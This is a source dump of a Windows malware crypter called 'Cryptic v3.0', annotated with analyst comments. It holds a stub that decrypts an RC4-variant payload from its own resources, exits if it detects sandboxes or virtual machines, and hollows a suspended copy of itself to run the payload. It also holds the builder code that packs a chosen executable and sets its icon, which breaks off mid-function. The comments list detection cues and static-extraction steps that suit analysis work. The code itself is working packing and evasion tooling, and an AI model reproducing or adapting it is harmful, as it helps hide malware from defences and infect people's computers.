// file held in lpBuffer. This is the technique commonly called process
// hollowing or "RunPE" (MITRE ATT&CK T1055.012).
//   szProcessName - command line handed to CreateProcessA for the host
//                   process; WinMain() passes the stub's own module path.
//   lpBuffer      - PE file in raw on-disk layout.
// Returns nothing. The only validation is the DOS and NT signature checks.
// No API return value is inspected, e_lfanew and the section offsets and sizes
// read from lpBuffer are used without bounds checks, and pi.hProcess /
// pi.hThread are never closed.
// Detection note: the API order below, applied to a freshly created child, is
// the behavioural pattern EDR and sandbox rules key on for this technique:
// CreateProcess(CREATE_SUSPENDED), NtUnmapViewOfSection,
// VirtualAllocEx(PAGE_EXECUTE_READWRITE), WriteProcessMemory,
// SetThreadContext, ResumeThread. A child whose in-memory image no longer
// matches its file on disk is the matching memory-forensics artefact.
172 | VOID InjectPE(LPSTR szProcessName, LPBYTE lpBuffer)
173 | {
174 | STARTUPINFO si;
175 | PROCESS_INFORMATION pi;
176 | CONTEXT ctx;
177 | memset(&si, 0, sizeof(si));
178 | si.cb = sizeof(STARTUPINFO);
179 | ctx.ContextFlags = CONTEXT_FULL;
180 | pidh = (PIMAGE_DOS_HEADER)&lpBuffer[0];
181 | if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
182 | {
183 | return;
184 | }
185 | pinh = (PIMAGE_NT_HEADERS)&lpBuffer[pidh->e_lfanew];
186 | if(pinh->Signature != IMAGE_NT_SIGNATURE)
187 | {
188 | return;
189 | }
// Every API used for the injection is resolved by name at run time; none of
// the GetModuleHandle()/GetProcAddress() results is checked for NULL.
190 | _CreateProcess __CreateProcess = NULL;
191 | __CreateProcess = (_CreateProcess)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateProcessA");
192 | _NtUnmapViewOfSection __NtUnmapViewOfSection = NULL;
193 | __NtUnmapViewOfSection = (_NtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection");
194 | _VirtualAllocEx __VirtualAllocEx = NULL;
195 | __VirtualAllocEx = (_VirtualAllocEx)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
196 | _WriteProcessMemory __WriteProcessMemory = NULL;
197 | __WriteProcessMemory = (_WriteProcessMemory)GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
198 | _GetThreadContext __GetThreadContext = NULL;
199 | __GetThreadContext = (_GetThreadContext)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetThreadContext");
200 | _SetThreadContext __SetThreadContext = NULL;
201 | __SetThreadContext = (_SetThreadContext)GetProcAddress(GetModuleHandle("kernel32.dll"), "SetThreadContext");
202 | _ResumeThread __ResumeThread = NULL;
203 | __ResumeThread = (_ResumeThread)GetProcAddress(GetModuleHandle("kernel32.dll"), "ResumeThread");
// Host process is created suspended, so none of its own code has run yet.
204 | __CreateProcess(NULL, szProcessName, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
// Unmap whatever the child has mapped at the payload's preferred ImageBase,
// then allocate SizeOfImage bytes at that same address as read/write/execute.
205 | __NtUnmapViewOfSection(pi.hProcess, (PVOID)pinh->OptionalHeader.ImageBase);
206 | __VirtualAllocEx(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Copy the PE headers, then each section's raw data to ImageBase + VirtualAddress.
207 | __WriteProcessMemory(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, &lpBuffer[0], pinh->OptionalHeader.SizeOfHeaders, NULL);
208 | for(INT i = 0; i < pinh->FileHeader.NumberOfSections; i++)
209 | {
// Section headers are located at a fixed sizeof(IMAGE_NT_HEADERS) past e_lfanew.
210 | pish = (PIMAGE_SECTION_HEADER)&lpBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i];
211 | __WriteProcessMemory(pi.hProcess, (LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress), &lpBuffer[pish->PointerToRawData], pish->SizeOfRawData, NULL);
212 | }
// Point the suspended primary thread at the payload's entry point (written to
// Eax in its context, so this is 32-bit x86 only), then let it run.
213 | __GetThreadContext(pi.hThread, &ctx);
214 | ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
215 | __SetThreadContext(pi.hThread, &ctx);
216 | __ResumeThread(pi.hThread);
217 | }
218 |
// RC4: XORs dwBufLen bytes of lpBuf in place with an RC4-style keystream
// derived from lpKey (dwKeyLen bytes) and returns lpBuf.
//   dwKeyLen must be non-zero: it is used as a modulus in the key schedule.
// Analyst note: this is not byte-compatible with reference RC4. After the
// key-scheduling loop, `b` keeps its final key-schedule value instead of being
// reset to 0 before keystream generation (`a` is 256 at that point, so
// (a + 1) % 256 starts at 1 as in the reference algorithm). A static unpacker
// has to reproduce this variant; a stock RC4 routine will not recover the
// payload.
219 | LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
220 | {
221 | INT a, b = 0, s[256];
222 | BYTE swap;
223 | DWORD dwCount;
// Identity permutation.
224 | for(a = 0; a < 256; a++)
225 | {
226 | s[a] = a;
227 | }
// Key schedule: mix the key bytes into the permutation.
228 | for(a = 0; a < 256; a++)
229 | {
230 | b = (b + s[a] + lpKey[a % dwKeyLen]) % 256;
231 | swap = s[a];
232 | s[a] = s[b];
233 | s[b] = swap;
234 | }
// Keystream generation and in-place XOR; a and b carry over from the loop above.
235 | for(dwCount = 0; dwCount < dwBufLen; dwCount++)
236 | {
237 | a = (a + 1) % 256;
238 | b = (b + s[a]) % 256;
239 | swap = s[a];
240 | s[a] = s[b];
241 | s[b] = swap;
242 | lpBuf[dwCount] ^= s[(s[a] + s[b]) % 256];
243 | }
244 | return lpBuf;
245 | }
246 |
// WinMain: stub entry point. In order, it:
//   1. enforces a single instance through the named mutex "m_Stub";
//   2. runs five environment checks (IsAnubis, IsNormanSandBox,
//      IsSunbeltSandBox, IsVirtualPC, IsVMware) and exits with 0 if any
//      returns true;
//   3. loads RT_RCDATA resource 150 (encrypted payload) and resource 151 (key)
//      from its own image;
//   4. decrypts the payload in place with RC4() and passes it to InjectPE()
//      with the stub's own path as the host process.
// Always returns 0, so the exit code does not reveal which path was taken.
// Analyst notes:
//   - Host indicator: a mutex named "m_Stub".
//   - Static extraction: the payload and key are RT_RCDATA resources 150 and
//     151 of the packed file. They can be pulled with a resource viewer and
//     decrypted offline with the RC4 variant in this file, without executing
//     the sample.
//   - Behaviour: the stub launches a second, suspended copy of its own
//     executable and hollows it (see InjectPE), so the process tree shows the
//     sample parenting itself.
247 | int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
248 | {
249 | HANDLE hMutex;
// If the mutex already exists another instance is running: exit.
250 | hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "m_Stub");
251 | if(hMutex == NULL)
252 | {
253 | hMutex = CreateMutex(NULL, FALSE, "m_Stub");
254 | }
255 | else
256 | {
257 | return 0;
258 | }
259 | // anti-anubis ->
260 | if(IsAnubis())
261 | {
262 | return 0;
263 | }
264 | // <- anti-anubis
265 | // anti-normansandbox ->
266 | if(IsNormanSandBox())
267 | {
268 | return 0;
269 | }
270 | // <- anti-normansandbox
271 | // anti-sunbeltsandbox ->
272 | if(IsSunbeltSandBox())
273 | {
274 | return 0;
275 | }
276 | // <- anti-sunbeltsandbox
277 | // anti-virtualpc ->
278 | if(IsVirtualPC())
279 | {
280 | return 0;
281 | }
282 | // <- anti-virtualpc
283 | // anti-vmware ->
284 | if(IsVMware())
285 | {
286 | return 0;
287 | }
288 | // <- anti-vmware
// Own executable path; later used as the host process for InjectPE().
289 | CHAR szFileName[MAX_PATH];
290 | GetModuleFileName(NULL, szFileName, MAX_PATH);
// Resource 150 (RT_RCDATA): the encrypted payload.
291 | HRSRC hRsrc;
292 | hRsrc = FindResource(NULL, MAKEINTRESOURCE(150), RT_RCDATA);
293 | if(hRsrc == NULL)
294 | {
295 | return 0;
296 | }
// This local shadows the file-scope dwFileSize.
297 | DWORD dwFileSize;
298 | dwFileSize = SizeofResource(NULL, hRsrc);
299 | HGLOBAL hGlob;
300 | hGlob = LoadResource(NULL, hRsrc);
301 | if(hGlob == NULL)
302 | {
303 | return 0;
304 | }
305 | LPBYTE lpFile;
306 | lpFile = (LPBYTE)LockResource(hGlob);
307 | if(lpFile == NULL)
308 | {
309 | return 0;
310 | }
// Resource 151 (RT_RCDATA): the key passed to RC4().
311 | hRsrc = FindResource(NULL, MAKEINTRESOURCE(151), RT_RCDATA);
312 | if(hRsrc == NULL)
313 | {
314 | return 0;
315 | }
316 | DWORD dwKeySize;
317 | dwKeySize = SizeofResource(NULL, hRsrc);
318 | hGlob = LoadResource(NULL, hRsrc);
319 | if(hGlob == NULL)
320 | {
321 | return 0;
322 | }
323 | LPBYTE lpKey;
324 | lpKey = (LPBYTE)LockResource(hGlob);
325 | if(lpKey == NULL)
326 | {
327 | return 0;
328 | }
// RC4() decrypts the locked resource bytes in place and returns the same
// pointer, which InjectPE() then treats as a raw PE file.
329 | InjectPE(szFileName, RC4(&lpFile[0], &lpKey[0], dwFileSize, dwKeySize));
330 | return 0;
331 | }
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by stub.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1000
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/Stub/stub.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // Portuguese (Portugal) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_PTG)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_PORTUGUESE, SUBLANG_PORTUGUESE
21 | #pragma code_page(1252)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 | #endif // Portuguese (Portugal) resources
50 | /////////////////////////////////////////////////////////////////////////////
51 |
52 |
53 |
54 | #ifndef APSTUDIO_INVOKED
55 | /////////////////////////////////////////////////////////////////////////////
56 | //
57 | // Generated from the TEXTINCLUDE 3 resource.
58 | //
59 |
60 |
61 | /////////////////////////////////////////////////////////////////////////////
62 | #endif // not APSTUDIO_INVOKED
63 |
64 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/XPThemes.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 | Windows Forms Common Control manifest
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/cryptic.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/cryptic.bmp
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/exe.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/exe.ico
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include "resource.h"
7 |
// Directory entry as stored in a .ico file: one per image. AddIcon reads these
// from the icon file and uses dwImageOffset / dwBytesInRes to locate each image.
typedef struct _ICONDIRENTRY {
    BYTE bWidth;
    BYTE bHeight;
    BYTE bColorCount;
    BYTE bReserved;
    WORD wPlanes;
    WORD wBitCount;
    DWORD dwBytesInRes;     // size of the image data in bytes
    DWORD dwImageOffset;    // offset of the image data from the start of the .ico file
} ICONDIRENTRY,
* LPICONDIRENTRY;

// Header of a .ico file followed by idCount entries. Declared with the default
// packing (the pack(2) pragmas below do not cover it).
typedef struct _ICONDIR {
    WORD idReserved;
    WORD idType;
    WORD idCount;
    ICONDIRENTRY idEntries[1];
} ICONDIR,
* LPICONDIR;

// Entry of an RT_GROUP_ICON resource. Same leading fields as ICONDIRENTRY, but
// the file offset is replaced by nID, the id of the matching RT_ICON resource.
// pack(2) keeps the structure free of padding so it can be written as-is.
#pragma pack(push)
#pragma pack(2)
typedef struct _GRPICONDIRENTRY {
    BYTE bWidth;
    BYTE bHeight;
    BYTE bColorCount;
    BYTE bReserved;
    WORD wPlanes;
    WORD wBitCount;
    DWORD dwBytesInRes;
    WORD nID;
} GRPICONDIRENTRY,
* LPGRPICONDIRENTRY;
#pragma pack(pop)

// Header of an RT_GROUP_ICON resource followed by idCount entries.
#pragma pack(push)
#pragma pack(2)
typedef struct _GRPICONDIR {
    WORD idReserved;
    WORD idType;
    WORD idCount;
    GRPICONDIRENTRY idEntries[1];
} GRPICONDIR,
* LPGRPICONDIR;
#pragma pack(pop)

// Header pointers into lpFileBuffer; pidh and pinh are set by LoadPE, pish by
// the IDC_BUILD handler in DlgProc.
PIMAGE_DOS_HEADER pidh;
PIMAGE_NT_HEADERS pinh;
PIMAGE_SECTION_HEADER pish;

HINSTANCE hInst;    // module instance, stored by WinMain
HICON hIcon;        // icon currently shown in the IDC_ICONIMG control

// Input executable as read by LoadPE (size and heap buffer).
DWORD dwFileSize;
LPBYTE lpFileBuffer;

CHAR szEFileName[MAX_PATH];     // path of the executable being processed
CHAR szIFileName[MAX_PATH];     // path of the optional .ico file
66 |
// Reads the file at szFileName into the global lpFileBuffer and checks that it
// begins with a DOS header whose e_lfanew points at an NT signature.
// On success dwFileSize, lpFileBuffer, pidh and pinh are set and TRUE is
// returned; on any failure FALSE is returned.
BOOL LoadPE(LPSTR szFileName)
{
    HANDLE hFile = CreateFile(szFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    dwFileSize = GetFileSize(hFile, NULL);
    if(dwFileSize == INVALID_FILE_SIZE)
    {
        // NOTE(review): hFile is not closed on this path or the next one.
        return FALSE;
    }
    // The buffer is reused across calls; on failure realloc's NULL overwrites
    // the only pointer to the previous buffer.
    lpFileBuffer = (LPBYTE)realloc(lpFileBuffer, dwFileSize);
    if(lpFileBuffer == NULL)
    {
        return FALSE;
    }
    DWORD dwBytesRead;
    // NOTE(review): neither the return value nor dwBytesRead is checked, so a
    // short or failed read leaves uninitialised bytes in the buffer.
    ReadFile(hFile, lpFileBuffer, dwFileSize, &dwBytesRead, NULL);
    CloseHandle(hFile);
    pidh = (PIMAGE_DOS_HEADER)&lpFileBuffer[0];
    if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
    {
        // NOTE(review): the global keeps the freed address, and the next call
        // hands it to realloc.
        free(lpFileBuffer);
        return FALSE;
    }
    // e_lfanew comes straight from the file and is not compared with
    // dwFileSize, nor is the file checked to be large enough for either header.
    pinh = (PIMAGE_NT_HEADERS)&lpFileBuffer[pidh->e_lfanew];
    if(pinh->Signature != IMAGE_NT_SIGNATURE)
    {
        free(lpFileBuffer);
        return FALSE;
    }
    return TRUE;
}
101 |
// Copies the images of the .ico file szIFileName into the executable
// szEFileName as RT_ICON resources 1..idCount plus one RT_GROUP_ICON resource
// with id 1, all with a neutral language id.
// Returns TRUE when the resource update was committed, FALSE otherwise.
// Note: the parameters shadow the globals of the same names.
BOOL AddIcon(LPSTR szIFileName, LPSTR szEFileName)
{
    HANDLE hFile = CreateFile(szIFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    LPICONDIR lpid;
    lpid = (LPICONDIR)malloc(sizeof(ICONDIR));
    if(lpid == NULL)
    {
        return FALSE;
    }
    DWORD dwBytesRead;
    // Read the three-WORD .ico header field by field; results are not checked.
    ReadFile(hFile, &lpid->idReserved, sizeof(WORD), &dwBytesRead, NULL);
    ReadFile(hFile, &lpid->idType, sizeof(WORD), &dwBytesRead, NULL);
    ReadFile(hFile, &lpid->idCount, sizeof(WORD), &dwBytesRead, NULL);
    // idCount is taken from the file as-is and sizes every allocation below.
    // NOTE(review): ICONDIR is declared outside the pack(2) region, so
    // idEntries presumably starts at offset 8 rather than 6 and this size is
    // two bytes short of what the read below writes - confirm against the
    // compiler's packing.
    lpid = (LPICONDIR)realloc(lpid, (sizeof(WORD) * 3) + (sizeof(ICONDIRENTRY) * lpid->idCount));
    if(lpid == NULL)
    {
        return FALSE;
    }
    ReadFile(hFile, &lpid->idEntries[0], sizeof(ICONDIRENTRY) * lpid->idCount, &dwBytesRead, NULL);
    // Build the RT_GROUP_ICON directory that mirrors the .ico directory.
    LPGRPICONDIR lpgid;
    lpgid = (LPGRPICONDIR)malloc(sizeof(GRPICONDIR));
    if(lpgid == NULL)
    {
        return FALSE;
    }
    lpgid->idReserved = lpid->idReserved;
    lpgid->idType = lpid->idType;
    lpgid->idCount = lpid->idCount;
    lpgid = (LPGRPICONDIR)realloc(lpgid, (sizeof(WORD) * 3) + (sizeof(GRPICONDIRENTRY) * lpgid->idCount));
    if(lpgid == NULL)
    {
        return FALSE;
    }
    for(int i = 0; i < lpgid->idCount; i++)
    {
        lpgid->idEntries[i].bWidth = lpid->idEntries[i].bWidth;
        lpgid->idEntries[i].bHeight = lpid->idEntries[i].bHeight;
        lpgid->idEntries[i].bColorCount = lpid->idEntries[i].bColorCount;
        lpgid->idEntries[i].bReserved = lpid->idEntries[i].bReserved;
        lpgid->idEntries[i].wPlanes = lpid->idEntries[i].wPlanes;
        lpgid->idEntries[i].wBitCount = lpid->idEntries[i].wBitCount;
        lpgid->idEntries[i].dwBytesInRes = lpid->idEntries[i].dwBytesInRes;
        // RT_ICON ids are assigned sequentially starting at 1.
        lpgid->idEntries[i].nID = i + 1;
    }
    HANDLE hUpdate;
    // TRUE = delete the existing resources of the target before adding.
    hUpdate = BeginUpdateResource(szEFileName, TRUE);
    if(hUpdate == NULL)
    {
        CloseHandle(hFile);
        return FALSE;
    }
    // Reuses `i` from the loop above, which only compiles with the
    // pre-standard for-scope rule.
    for(i = 0; i < lpid->idCount; i++)
    {
        // Size and offset of each image are taken from the file unchecked.
        LPBYTE lpBuffer = (LPBYTE)malloc(lpid->idEntries[i].dwBytesInRes);
        if(lpBuffer == NULL)
        {
            CloseHandle(hFile);
            return FALSE;
        }
        SetFilePointer(hFile, lpid->idEntries[i].dwImageOffset, NULL, FILE_BEGIN);
        ReadFile(hFile, lpBuffer, lpid->idEntries[i].dwBytesInRes, &dwBytesRead, NULL);
        if(UpdateResource(hUpdate, RT_ICON, MAKEINTRESOURCE(lpgid->idEntries[i].nID), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpBuffer[0], lpid->idEntries[i].dwBytesInRes) == FALSE)
        {
            CloseHandle(hFile);
            free(lpBuffer);
            return FALSE;
        }
        free(lpBuffer);
    }
    CloseHandle(hFile);
    if(UpdateResource(hUpdate, RT_GROUP_ICON, MAKEINTRESOURCE(1), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpgid[0], (sizeof(WORD) * 3) + (sizeof(GRPICONDIRENTRY) * lpgid->idCount)) == FALSE)
    {
        return FALSE;
    }
    // FALSE = commit the pending changes to the file.
    // NOTE(review): lpid and lpgid are never freed on any path, and the early
    // returns after BeginUpdateResource leave the update handle open.
    if(EndUpdateResource(hUpdate, FALSE) == FALSE)
    {
        return FALSE;
    }
    return TRUE;
}
186 |
// XORs dwBufLen bytes of lpBuf in place with an RC4-style keystream derived
// from lpKey/dwKeyLen and returns lpBuf. Calling it twice with the same key
// restores the original bytes.
//
// This is not textbook RC4: after the key-scheduling loop `a` is 256 and `b`
// keeps its final value, and neither is reset before the output loop. The
// first index update still yields a == 1, but `b` starts from its
// key-schedule value instead of 0, so a reference RC4 implementation produces
// a different keystream for the same key.
LPBYTE RC4(LPBYTE lpBuf, LPBYTE lpKey, DWORD dwBufLen, DWORD dwKeyLen)
{
    int a, b = 0, s[256];
    BYTE swap;      // s[] only ever holds 0..255, so the narrowing is lossless
    DWORD dwCount;
    // Identity permutation.
    for(a = 0; a < 256; a++)
    {
        s[a] = a;
    }
    // Key scheduling. NOTE(review): dwKeyLen == 0 divides by zero here.
    for(a = 0; a < 256; a++)
    {
        b = (b + s[a] + lpKey[a % dwKeyLen]) % 256;
        swap = s[a];
        s[a] = s[b];
        s[b] = swap;
    }
    // Keystream generation and XOR; a and b carry over from the loop above.
    for(dwCount = 0; dwCount < dwBufLen; dwCount++)
    {
        a = (a + 1) % 256;
        b = (b + s[a]) % 256;
        swap = s[a];
        s[a] = s[b];
        s[b] = swap;
        lpBuf[dwCount] ^= s[(s[a] + s[b]) % 256];
    }
    return lpBuf;
}
214 |
// Enables or disables every interactive control of the main dialog in one go;
// used to lock the UI while a build is running.
VOID EnableControls(HWND hWnd, BOOL bEnable)
{
    static const int kControlIds[] = {
        IDC_FILE, IDC_BROWSE, IDC_BACKUP, IDC_ADDICON,
        IDC_ICONIMG, IDC_BUILD, IDC_ABOUT, IDC_EXIT
    };
    const unsigned int kControlCount = sizeof(kControlIds) / sizeof(kControlIds[0]);

    for(unsigned int n = 0; n < kControlCount; n++)
    {
        EnableWindow(GetDlgItem(hWnd, kControlIds[n]), bEnable);
    }
}
226 |
// Dialog procedure of the builder window.
//
// The IDC_BUILD branch is the part that matters for analysis. It overwrites
// the selected executable with the embedded stub (resource IDR_STUB, type
// "STUB") and then adds two RT_RCDATA resources with a neutral language id:
//   150 - the original file, transformed in place by RC4() above
//   151 - the 15-byte key used for that transformation
// The key is therefore stored in clear next to the data it protects. Any
// overlay that followed the last section of the original file is appended to
// the output unencrypted.
BOOL CALLBACK DlgProc(HWND hDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    OPENFILENAME ofn;
    POINT pt;
    RECT rect;
    switch(uMsg){
    case WM_INITDIALOG:
        InitCommonControls();
        hIcon = LoadIcon(hInst, MAKEINTRESOURCE(IDI_MAIN));
        SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
        // Backup is on by default; the path box is read-only (filled by
        // browse or drag-and-drop) and Build stays disabled until a file loads.
        CheckDlgButton(hDlg, IDC_BACKUP, BST_CHECKED);
        SendMessage(GetDlgItem(hDlg, IDC_FILE), EM_SETREADONLY, (WPARAM)TRUE, (LPARAM)0);
        hIcon = LoadIcon(hInst, MAKEINTRESOURCE(IDI_EXE));
        SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
        EnableWindow(GetDlgItem(hDlg, IDC_BUILD), FALSE);
        SetWindowPos(hDlg, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE);
        break;
    case WM_CLOSE:
        EndDialog(hDlg, 0);
        break;
    case WM_PAINT:
        SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
        break;
    case WM_DROPFILES:
        // Only the first dropped file is used.
        HDROP hDrop;
        hDrop = HDROP(wParam);
        DragQueryFile(hDrop, 0, szEFileName, sizeof(szEFileName));
        DragFinish(hDrop);
        if(LoadPE(szEFileName) == FALSE)
        {
            MessageBox(hDlg, "Could not load file!", "Cryptic", MB_ICONERROR);
            return TRUE;
        }
        SetDlgItemText(hDlg, IDC_FILE, szEFileName);
        EnableWindow(GetDlgItem(hDlg, IDC_BUILD), TRUE);
        break;
    case WM_MOUSEMOVE:
        // Show cursor 32649 while the pointer is over the icon preview.
        GetCursorPos(&pt);
        GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
        if(PtInRect(&rect, pt))
        {
            SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
        }
        else
        {
            SetCursor(LoadCursor(NULL, IDC_ARROW));
        }
        break;
    case WM_LBUTTONDOWN:
        // Clicking the icon preview opens a file dialog to choose a .ico file.
        GetCursorPos(&pt);
        GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
        if(PtInRect(&rect, pt))
        {
            SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
            memset(&ofn, 0, sizeof(ofn));
            szIFileName[0] = '\0';
            ofn.lStructSize = sizeof(OPENFILENAME);
            ofn.hwndOwner = hDlg;
            ofn.lpstrFilter = "Icon Files (*.ico)\0*.ico\0\0";
            ofn.lpstrFile = szIFileName;
            ofn.nMaxFile = MAX_PATH;
            ofn.Flags = OFN_PATHMUSTEXIST;
            if(GetOpenFileName(&ofn))
            {
                hIcon = ExtractIcon(hInst, szIFileName, 0);
                SendMessage(GetDlgItem(hDlg, IDC_ICONIMG), STM_SETICON, (WPARAM)hIcon, (LPARAM)0);
            }
        }
        break;
    case WM_RBUTTONDOWN:
        GetCursorPos(&pt);
        GetWindowRect(GetDlgItem(hDlg, IDC_ICONIMG), &rect);
        if(PtInRect(&rect, pt))
        {
            SetCursor(LoadCursor(NULL, MAKEINTRESOURCE(32649)));
        }
        break;
    case WM_COMMAND:
        switch LOWORD(wParam){
        case IDC_BROWSE:
            memset(&ofn, 0, sizeof(ofn));
            szEFileName[0] = '\0';
            ofn.lStructSize = sizeof(OPENFILENAME);
            ofn.hwndOwner = hDlg;
            ofn.lpstrFilter = "Executable Files (*.exe)\0*.exe\0\0";
            ofn.lpstrFile = szEFileName;
            ofn.nMaxFile = MAX_PATH;
            ofn.Flags = OFN_PATHMUSTEXIST;
            if(GetOpenFileName(&ofn))
            {
                if(LoadPE(szEFileName) == FALSE)
                {
                    MessageBox(hDlg, "Could not load file!", "Cryptic", MB_ICONERROR);
                    return TRUE;
                }
                SetDlgItemText(hDlg, IDC_FILE, szEFileName);
                EnableWindow(GetDlgItem(hDlg, IDC_BUILD), TRUE);
            }
            break;
        case IDC_BUILD:
            EnableControls(hDlg, FALSE);
            // Locate the stub image embedded in this program's own resources.
            HRSRC hRsrc;
            hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_STUB), "STUB");
            if(hRsrc == NULL)
            {
                MessageBox(hDlg, "Could not find resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            DWORD dwRsrcSize;
            dwRsrcSize = SizeofResource(NULL, hRsrc);
            HGLOBAL hGlob;
            hGlob = LoadResource(NULL, hRsrc);
            if(hGlob == NULL)
            {
                MessageBox(hDlg, "Could not load resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            LPBYTE lpBuffer;
            // lpBuffer comes from LockResource, not from malloc.
            // NOTE(review): the free(lpBuffer) calls further down therefore
            // pass a pointer the C heap never allocated.
            lpBuffer = (LPBYTE)LockResource(hGlob);
            if(lpBuffer == NULL)
            {
                MessageBox(hDlg, "Could not lock resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            GetDlgItemText(hDlg, IDC_FILE, szEFileName, MAX_PATH);
            if(IsDlgButtonChecked(hDlg, IDC_BACKUP) == BST_CHECKED)
            {
                // Backup copy is "<original path>.bak"; an existing file of
                // that name is overwritten (bFailIfExists == FALSE).
                // NOTE(review): strcat can overrun szBFileName when the path
                // is within four characters of MAX_PATH.
                CHAR szBFileName[MAX_PATH];
                GetDlgItemText(hDlg, IDC_FILE, szBFileName, MAX_PATH);
                strcat(szBFileName, ".bak");
                if(CopyFile(szEFileName, szBFileName, FALSE) == 0)
                {
                    free(lpBuffer);
                    MessageBox(hDlg, "Could not copy file!", "Cryptic", MB_ICONERROR);
                    EnableControls(hDlg, TRUE);
                    return TRUE;
                }
            }
            // Per-build key: 15 bytes from rand() seeded with the current
            // time, each in the range 1..255 (never zero).
            // NOTE(review): lpKey has 14 elements but 15 are written here and
            // 15 are read below, one byte past the end of the array.
            BYTE lpKey[14];
            srand(time(NULL));
            int i;
            for(i = 0; i < 15; i++)
            {
                lpKey[i] = BYTE(rand() % 255 + 1);
            }
            // Replace the selected file with the stub image (CREATE_ALWAYS
            // truncates it). The original content now lives only in
            // lpFileBuffer and in the optional .bak copy.
